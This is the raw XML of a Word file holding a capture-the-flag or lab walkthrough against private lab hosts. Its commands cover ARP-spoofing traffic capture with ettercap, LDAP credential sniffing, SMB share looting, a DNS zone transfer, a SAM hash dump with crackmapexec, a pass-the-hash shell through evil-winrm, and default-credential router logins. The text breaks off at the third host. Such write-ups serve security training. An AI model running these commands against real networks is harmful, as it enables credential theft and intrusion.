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AFF460" w14:textId="26562B0B" w:rsidR="00AF758E" w:rsidRDefault="0013781B" w:rsidP="00B35CF3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>10.11.12.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3FA823" w14:textId="06E35618" w:rsidR="0013781B" w:rsidRDefault="0013781B" w:rsidP="00B35CF3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421A5357" w14:textId="77777777" w:rsidR="0013781B" w:rsidRPr="007F6147" w:rsidRDefault="0013781B" w:rsidP="00B35CF3">
      <w:r w:rsidRPr="007F6147">
        <w:t>Do not forget to check all machines online if you know the netmask:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AD8114" w14:textId="11598D48" w:rsidR="0013781B" w:rsidRPr="007F6147" w:rsidRDefault="0013781B" w:rsidP="00B35CF3">
      <w:r w:rsidRPr="007F6147">
        <w:t>`sudo nmap -sn 10.11.12.0-100`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A98386F" w14:textId="338DC4CB" w:rsidR="0013781B" w:rsidRPr="007F6147" w:rsidRDefault="0013781B" w:rsidP="00B35CF3">
      <w:r w:rsidRPr="007F6147">
        <w:t>First lets check the version and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB9AA35" w14:textId="77777777" w:rsidR="0013781B" w:rsidRPr="007F6147" w:rsidRDefault="0013781B" w:rsidP="00B35CF3">
      <w:r w:rsidRPr="007F6147">
        <w:t>`sudo nmap -sV -O 10.11.12.6` (-sV for versions, -O for operating system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FC085A" w14:textId="5C2C39AA" w:rsidR="0013781B" w:rsidRPr="0013781B" w:rsidRDefault="00014509" w:rsidP="00B35CF3">
      <w:r w:rsidRPr="00014509">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27AD273F" wp14:editId="073C2B63">
            <wp:extent cx="5940425" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1186216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1608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5A0A" w14:textId="0B67E86C" w:rsidR="0013781B" w:rsidRDefault="00014509" w:rsidP="00B35CF3">
      <w:r w:rsidRPr="00014509">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C4C23D1" wp14:editId="0A3C4492">
            <wp:extent cx="4505325" cy="981075"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="17137153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15364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A56E" w14:textId="77777777" w:rsidR="001E5CFB" w:rsidRPr="00EF69A0" w:rsidRDefault="001E5CFB" w:rsidP="00B35CF3">
      <w:r w:rsidRPr="00EF69A0">
        <w:t>Once we have that, we need to check what we can do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209CEECD" w14:textId="4C0EED9A" w:rsidR="001E5CFB" w:rsidRDefault="00162028" w:rsidP="00B35CF3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CAF708" w14:textId="5E0A6CF6" w:rsidR="00162028" w:rsidRPr="00B35CF3" w:rsidRDefault="00162028" w:rsidP="00B35CF3">
      <w:r w:rsidRPr="00B35CF3">
        <w:t>See the msrpc/rpcbind and etc? Also see the domain and other services like LDAP? Considering all of this, it is probably a domain controller. It can also have different shared folders for it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762AE571" w14:textId="37128F26" w:rsidR="00162028" w:rsidRPr="00B35CF3" w:rsidRDefault="00162028" w:rsidP="00B35CF3">
      <w:r w:rsidRPr="00B35CF3">
        <w:t>`sudo showmount -e 10.11.12.6` (-e to show exports)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B107D3" w14:textId="77777777" w:rsidR="00162028" w:rsidRPr="00B35CF3" w:rsidRDefault="00162028" w:rsidP="00B35CF3">
      <w:r w:rsidRPr="00B35CF3">
        <w:t>We get the /Data available to everyone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1D09F1" w14:textId="15F2D50C" w:rsidR="00162028" w:rsidRDefault="00095077" w:rsidP="00B35CF3">
      <w:r w:rsidRPr="00095077">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FE3F90A" wp14:editId="3CEAAE0D">
            <wp:extent cx="3609975" cy="790575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="13631492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49235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C29B" w14:textId="52F683B9" w:rsidR="00230C57" w:rsidRPr="00230C57" w:rsidRDefault="00230C57" w:rsidP="00230C57">
      <w:r w:rsidRPr="00230C57">
        <w:t>Then, mount the folder somewhere on your system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF58877" w14:textId="459A7E92" w:rsidR="00230C57" w:rsidRPr="00230C57" w:rsidRDefault="00230C57" w:rsidP="00230C57">
      <w:r w:rsidRPr="00230C57">
        <w:t>`sudo mount 10.11.12.6:/Data /mnt/shared_folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C80FB46" w14:textId="77777777" w:rsidR="00230C57" w:rsidRPr="00230C57" w:rsidRDefault="00230C57" w:rsidP="00230C57">
      <w:r w:rsidRPr="00230C57">
        <w:t>Then you get a flag from the shared folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4928D977" w14:textId="5D392A2A" w:rsidR="00230C57" w:rsidRDefault="00ED2B52" w:rsidP="00ED2B52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>QUESTION 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF7F0B3" w14:textId="32792B3F" w:rsidR="00ED2B52" w:rsidRPr="00ED2B52" w:rsidRDefault="00ED2B52" w:rsidP="00ED2B52">
      <w:r w:rsidRPr="00ED2B52">
        <w:t>You see LDAP bullshit? There is a possibility that some stuff might be happening behind the scenes in the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA8541B" w14:textId="3FA18507" w:rsidR="00ED2B52" w:rsidRPr="00ED2B52" w:rsidRDefault="00ED2B52" w:rsidP="00ED2B52">
      <w:r w:rsidRPr="00ED2B52">
        <w:t>There are quite some machines in the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15315DE0" w14:textId="74677286" w:rsidR="00ED2B52" w:rsidRPr="00ED2B52" w:rsidRDefault="00ED2B52" w:rsidP="00ED2B52">
      <w:r w:rsidRPr="00ED2B52">
        <w:t xml:space="preserve">We can check the traffic between the different targets </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5159D78C" w14:textId="387ED2BD" w:rsidR="00ED2B52" w:rsidRPr="00ED2B52" w:rsidRDefault="00ED2B52" w:rsidP="00ED2B52">
      <w:r w:rsidRPr="00ED2B52">
        <w:t>`sudo ettercap -T -i tap0 -M arp /10.11.12.6/10.11.12.48/ -w file.pcap` (-T for text mode, -i select the interface, -M set the mode, then targets (like between which or towards which it is going), -w for output)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A64BE3A" w14:textId="6D7CD139" w:rsidR="00ED2B52" w:rsidRPr="00ED2B52" w:rsidRDefault="00ED2B52" w:rsidP="00ED2B52">
      <w:r w:rsidRPr="00ED2B52">
        <w:t>or another one can be used as `sudo ettercap -Tq -i tap0 -M arp:remote /10.11.12.48//` (this will however show only one flag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792159E9" w14:textId="68736088" w:rsidR="00ED2B52" w:rsidRPr="00ED2B52" w:rsidRDefault="00ED2B52" w:rsidP="00ED2B52">
      <w:r w:rsidRPr="00ED2B52">
        <w:t>Then after some time you got the capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FF1E91" w14:textId="2D4B1FBE" w:rsidR="00ED2B52" w:rsidRPr="00ED2B52" w:rsidRDefault="00ED2B52" w:rsidP="00ED2B52">
      <w:r w:rsidRPr="00ED2B52">
        <w:t>Use `tcpdump -r file.pcap -A &gt; file.txt` (-A for print each packet in ASCII, -r probably for reading)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17447666" w14:textId="77777777" w:rsidR="00ED2B52" w:rsidRPr="00ED2B52" w:rsidRDefault="00ED2B52" w:rsidP="00ED2B52">
      <w:r w:rsidRPr="00ED2B52">
        <w:t>Then you can analyze the file with `cat file.txt | grep FLAG` and you should get at least one FLAG (FLAG-6986) which is also a password for LDAP (and also some other possible flags, like for FTP on another server, and another flag for another server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A86ABE" w14:textId="42574DD4" w:rsidR="00ED2B52" w:rsidRDefault="00AD6FAF" w:rsidP="00ED2B52">
      <w:r w:rsidRPr="00AD6FAF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A518B32" wp14:editId="1E4B5953">
            <wp:extent cx="5940425" cy="1671955"/>
            <wp:effectExtent l="0" t="0" r="3175" b="4445"/>
            <wp:docPr id="6811028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02874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40D" w14:textId="54FBB304" w:rsidR="00AD0167" w:rsidRDefault="00AD0167" w:rsidP="00AD0167">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3A4119" w14:textId="77777777" w:rsidR="00AD0167" w:rsidRDefault="00AD0167" w:rsidP="00AD0167">
      <w:r w:rsidRPr="00AD0167">
        <w:t>From previous question lets open the wireshark, open the .pcap file we got, then filter for `ldap` and then we can get some information with a user and its password being the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB8B7A7" w14:textId="01DEB509" w:rsidR="00D61445" w:rsidRDefault="00D61445" w:rsidP="00AD0167">
      <w:r w:rsidRPr="00D61445">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57D3C4C1" wp14:editId="3696093A">
            <wp:extent cx="5940425" cy="4502150"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="78780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028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6F1D" w14:textId="321E22D8" w:rsidR="00EC788B" w:rsidRPr="00EC788B" w:rsidRDefault="00EC788B" w:rsidP="00EC788B">
      <w:r w:rsidRPr="00EC788B">
        <w:t>We get user `ed@vault.vinyl` and password `FLAG-6986`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126C961B" w14:textId="7705BC85" w:rsidR="00EC788B" w:rsidRPr="00EC788B" w:rsidRDefault="00EC788B" w:rsidP="00EC788B">
      <w:r w:rsidRPr="00EC788B">
        <w:t>Now run the `ldapsearch -H ldap://10.11.12.6 -x -b "DC=vault,DC=vinyl" -D "ed@vault.vinyl" -W`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC7333E" w14:textId="77777777" w:rsidR="00EC788B" w:rsidRPr="00EC788B" w:rsidRDefault="00EC788B" w:rsidP="00EC788B">
      <w:r w:rsidRPr="00EC788B">
        <w:t>or you can run this `ldapsearch -x -H ldap://10.11.12.6:389 -D "ed@vault.vinyl" -w 'FLAG-6986' -b "dc=vault,dc=vinyl" "(&amp;(objectclass=person))"` (or add also | grep FLAG at the end) (-x for simple authentication, -H for host, -D for user or distinguished name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463FB5FE" w14:textId="22820324" w:rsidR="00EC788B" w:rsidRPr="00AD0167" w:rsidRDefault="006F2A1D" w:rsidP="00AD0167">
      <w:r w:rsidRPr="006F2A1D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70BF36F8" wp14:editId="1FC8D6EC">
            <wp:extent cx="5940425" cy="465455"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="123823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3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983B" w14:textId="77777777" w:rsidR="00321400" w:rsidRPr="00321400" w:rsidRDefault="00321400" w:rsidP="00321400">
      <w:r w:rsidRPr="00321400">
        <w:t xml:space="preserve">After that, you get quite some information that can be used. In this case you get information regarding users as well (like amelia@vault.vinyl). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076345F7" w14:textId="3A19D96E" w:rsidR="00AD0167" w:rsidRDefault="00773894" w:rsidP="00773894">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4781654B" w14:textId="48DF7AAE" w:rsidR="00773894" w:rsidRPr="00773894" w:rsidRDefault="00773894" w:rsidP="00773894">
      <w:r w:rsidRPr="00773894">
        <w:t>We got ourself a user, and then we can check the SMB functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD100C1" w14:textId="4C6B3BBC" w:rsidR="00773894" w:rsidRPr="00773894" w:rsidRDefault="00773894" w:rsidP="00773894">
      <w:r w:rsidRPr="00773894">
        <w:t>`sudo smbclient -L 10.11.12.6 -U ed%FLAG-6986`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26169BFF" w14:textId="77777777" w:rsidR="00773894" w:rsidRPr="00773894" w:rsidRDefault="00773894" w:rsidP="00773894">
      <w:r w:rsidRPr="00773894">
        <w:t>Then you will see some directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E6CF31" w14:textId="157B4FB3" w:rsidR="00773894" w:rsidRDefault="00415C9F" w:rsidP="00773894">
      <w:r w:rsidRPr="00415C9F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36AD3F80" wp14:editId="2897D5F3">
            <wp:extent cx="5940425" cy="2117090"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="12213796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79689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D068" w14:textId="4E8D9BFA" w:rsidR="00415C9F" w:rsidRPr="00415C9F" w:rsidRDefault="00415C9F" w:rsidP="00415C9F">
      <w:r w:rsidRPr="00415C9F">
        <w:t>Then you can run command to list the files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBED869" w14:textId="29A5A881" w:rsidR="00415C9F" w:rsidRPr="00415C9F" w:rsidRDefault="00415C9F" w:rsidP="00415C9F">
      <w:r w:rsidRPr="00415C9F">
        <w:t>`smbclient //10.11.12.6/Financial -U ed%FLAG-6986 -c "ls"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D9367B" w14:textId="533E18CE" w:rsidR="00415C9F" w:rsidRPr="00415C9F" w:rsidRDefault="00415C9F" w:rsidP="00415C9F">
      <w:r w:rsidRPr="00415C9F">
        <w:t>Then you can run this type of command to get the file from a directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CE68EA" w14:textId="104A7CAB" w:rsidR="00415C9F" w:rsidRPr="00415C9F" w:rsidRDefault="00415C9F" w:rsidP="00415C9F">
      <w:r w:rsidRPr="00415C9F">
        <w:t>`smbclient //10.11.12.6/Financial -U ed%FLAG-6986 -c "get FLAG.txt"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769BB577" w14:textId="77777777" w:rsidR="00415C9F" w:rsidRDefault="00415C9F" w:rsidP="00415C9F">
      <w:r w:rsidRPr="00415C9F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Then `cat FLAG.txt`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1CE24C" w14:textId="72423E36" w:rsidR="00165F84" w:rsidRPr="00165F84" w:rsidRDefault="00165F84" w:rsidP="00415C9F">
      <w:r w:rsidRPr="00165F84">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72598E3B" wp14:editId="46127D57">
            <wp:extent cx="5940425" cy="2626360"/>
            <wp:effectExtent l="0" t="0" r="3175" b="2540"/>
            <wp:docPr id="1877256688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56688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BDD6" w14:textId="613C5D54" w:rsidR="00415C9F" w:rsidRDefault="00515B13" w:rsidP="00515B13">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54344C9B" w14:textId="1E050229" w:rsidR="00515B13" w:rsidRPr="00515B13" w:rsidRDefault="00515B13" w:rsidP="00515B13">
      <w:r w:rsidRPr="00515B13">
        <w:t>Since this is a DNS Server, we can check for the DNS records and etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427F05E1" w14:textId="4130AB66" w:rsidR="00515B13" w:rsidRPr="00515B13" w:rsidRDefault="00515B13" w:rsidP="00515B13">
      <w:r w:rsidRPr="00515B13">
        <w:t>`dnsrecon -d vault.vinyl` (where you need to specify the domain name (in this case it is vault.vinyl anyway))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E117011" w14:textId="77777777" w:rsidR="00515B13" w:rsidRPr="00515B13" w:rsidRDefault="00515B13" w:rsidP="00515B13">
      <w:r w:rsidRPr="00515B13">
        <w:t>or you can run `dig axfr @10.11.12.6 vault.vinyl`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAF1410" w14:textId="7BB435E9" w:rsidR="00515B13" w:rsidRDefault="00187740" w:rsidP="00515B13">
      <w:r w:rsidRPr="00187740">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B85173E" wp14:editId="2A116CDD">
            <wp:extent cx="5940425" cy="2439035"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="164746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630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9CF" w14:textId="4BD04DD8" w:rsidR="008945A4" w:rsidRDefault="008945A4" w:rsidP="00515B13">
      <w:r>
        <w:t>This is all thanks to DNS Zone Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C79CA2" w14:textId="53511E6F" w:rsidR="00F934B8" w:rsidRDefault="00F934B8" w:rsidP="00F934B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07635BC6" w14:textId="56354D60" w:rsidR="00F934B8" w:rsidRDefault="00F934B8" w:rsidP="00F934B8">
      <w:r>
        <w:t>We need to get LDAP users, to get some data out of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A710D1E" w14:textId="61D34976" w:rsidR="00F934B8" w:rsidRDefault="00F934B8" w:rsidP="00F934B8">
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00F934B8">
        <w:t xml:space="preserve">crackmapexec smb 10.11.12.28 -u ed -p FLAG-6986 </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00F934B8">
        <w:t>sam</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidR="00B0695A">
        <w:t xml:space="preserve"> (smb for various shares it might have, </w:t>
      </w:r>
      <w:r w:rsidR="00A51C3B">
        <w:t>-u for user, -p for password, --sam/--users what to list. If hangs, try to change server or what to list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C828FD6" w14:textId="4868B4B1" w:rsidR="000D73E5" w:rsidRDefault="000D73E5" w:rsidP="00F934B8">
      <w:r w:rsidRPr="000D73E5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73E8C7BC" wp14:editId="2A212653">
            <wp:extent cx="5940425" cy="1774190"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="317690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900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C3F" w14:textId="057E9613" w:rsidR="000D73E5" w:rsidRDefault="000D73E5" w:rsidP="00F934B8">
      <w:r>
        <w:t>This will show us password hashes, after the last column type of hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA7C604" w14:textId="0DE4B39A" w:rsidR="000D73E5" w:rsidRDefault="000D73E5" w:rsidP="00F934B8">
      <w:r>
        <w:t>Then we want to know the users (unless we already have them with ldapsearch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E85CE3C" w14:textId="4EE7B1F3" w:rsidR="004F504D" w:rsidRDefault="004F504D" w:rsidP="00F934B8">
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="004F504D">
        <w:t xml:space="preserve">crackmapexec smb 10.11.12.6 -u ed -p FLAG-6986 </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="004F504D">
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1458172B" w14:textId="79BD5F27" w:rsidR="000D73E5" w:rsidRDefault="004F504D" w:rsidP="00F934B8">
      <w:r w:rsidRPr="004F504D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70F84244" wp14:editId="43B57C64">
            <wp:extent cx="5940425" cy="1599565"/>
            <wp:effectExtent l="0" t="0" r="3175" b="635"/>
            <wp:docPr id="1565792865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92865" name="Picture 1" descr="A computer screen with text and imag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023E" w14:textId="42691488" w:rsidR="00D54CE2" w:rsidRDefault="00D54CE2" w:rsidP="00F934B8">
      <w:r>
        <w:t xml:space="preserve">So then, by knowing the password hash (yes it allows it) and also the </w:t>
      </w:r>
      <w:r w:rsidR="00154B4D">
        <w:t>username, we can get into the machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593C890F" w14:textId="68286819" w:rsidR="00154B4D" w:rsidRDefault="00154B4D" w:rsidP="00F934B8">
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00154B4D">
        <w:t xml:space="preserve"> evil-winrm -i 10.11.12.6 -u amelia -H 0c19dfe9606d00dec987fcf4f02972f8</w:t>
      </w:r>
      <w:r>
        <w:t>` (you get like a remote shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D505AF" w14:textId="30229284" w:rsidR="003A4DEF" w:rsidRDefault="003A4DEF" w:rsidP="00F934B8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Then cd into C:\ and then cat FLAG.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226C5C03" w14:textId="1D9CC228" w:rsidR="00D35C8A" w:rsidRDefault="00F32E7D" w:rsidP="00F934B8">
      <w:r w:rsidRPr="00F32E7D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21D12F3B" wp14:editId="35DF5DBE">
            <wp:extent cx="5277587" cy="6096851"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4335451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45137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9E48" w14:textId="75D9A038" w:rsidR="000540E2" w:rsidRDefault="000540E2" w:rsidP="000540E2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>10.11.12.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F4A3BC" w14:textId="2F96E8C1" w:rsidR="00BD53C8" w:rsidRDefault="00CA6825" w:rsidP="00293D2D">
      <w:r>
        <w:t xml:space="preserve">NOTE: TO UNDERSTAND THAT YOU </w:t>
      </w:r>
      <w:r w:rsidR="00BD53C8">
        <w:t>HAVE A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROUTER, IT MIGHT HAVE PORT 53 (TCP), 80, 443 OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8E193F" w14:textId="4E1A98A3" w:rsidR="008A37F5" w:rsidRDefault="008A37F5" w:rsidP="00293D2D">
      <w:r w:rsidRPr="008A37F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D5E795B" wp14:editId="4D5E3553">
            <wp:extent cx="5287113" cy="2133898"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="18346556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55684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E1D" w14:textId="171FAECC" w:rsidR="00A6090B" w:rsidRDefault="00140525" w:rsidP="00140525">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475D0DE6" w14:textId="4935504B" w:rsidR="00140525" w:rsidRDefault="00140525" w:rsidP="00140525">
      <w:r>
        <w:t xml:space="preserve">Go to the website </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00BB1053">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.11.12.13</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>, then login with “root:opnsense” and then you will find a flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E73B9AA" w14:textId="163ED0CC" w:rsidR="00140525" w:rsidRDefault="00140525" w:rsidP="00140525">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA49C8D" w14:textId="3E3FC2E7" w:rsidR="00140525" w:rsidRDefault="00140525" w:rsidP="00140525">
      <w:r>
        <w:t>Go to the same website, but now go to System &gt; Settings &gt; Administration and find the SSH port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A0998E" w14:textId="1B1E2693" w:rsidR="00140525" w:rsidRDefault="00140525" w:rsidP="00140525">
      <w:r w:rsidRPr="00140525">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EBAA580" wp14:editId="096C1704">
            <wp:extent cx="5001323" cy="514422"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="158481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125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39C2" w14:textId="3E94C584" w:rsidR="00140525" w:rsidRDefault="00140525" w:rsidP="00140525">
      <w:r>
        <w:t xml:space="preserve">Then go into terminal, say `ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00BB1053">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>root@10.11.12.13</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -p 5569</w:t>
      </w:r>
      <w:r w:rsidR="00986335">
        <w:t>`, provide the password “opnsense” and you are in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A246BA6" w14:textId="4ED154DE" w:rsidR="00BA2CC9" w:rsidRDefault="00BA2CC9" w:rsidP="00140525">
      <w:r w:rsidRPr="00BA2CC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FB1B4EB" wp14:editId="46A3E39A">
            <wp:extent cx="5940425" cy="5041265"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6985"/>
            <wp:docPr id="1665118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84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171D" w14:textId="71248908" w:rsidR="00BA2CC9" w:rsidRDefault="00BA2CC9" w:rsidP="00140525">
      <w:r>
        <w:t>Press 8, then do ls, and cat FLAG.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9A9328" w14:textId="276BC497" w:rsidR="00BA2CC9" w:rsidRDefault="00BA2CC9" w:rsidP="00140525">
      <w:r w:rsidRPr="00BA2CC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C61A819" wp14:editId="70CC5244">
            <wp:extent cx="5772956" cy="1543265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="53130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019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0B81" w14:textId="59AE4D0C" w:rsidR="00456EFA" w:rsidRDefault="00D7017B" w:rsidP="00D7017B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>10.11.12.28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A701A2A" w14:textId="5A83064C" w:rsidR="00D7017B" w:rsidRDefault="00163C4C" w:rsidP="00163C4C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5247EC73" w14:textId="1EE88831" w:rsidR="00163C4C" w:rsidRDefault="005B7CB7" w:rsidP="00163C4C">
      <w:r w:rsidRPr="005B7CB7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
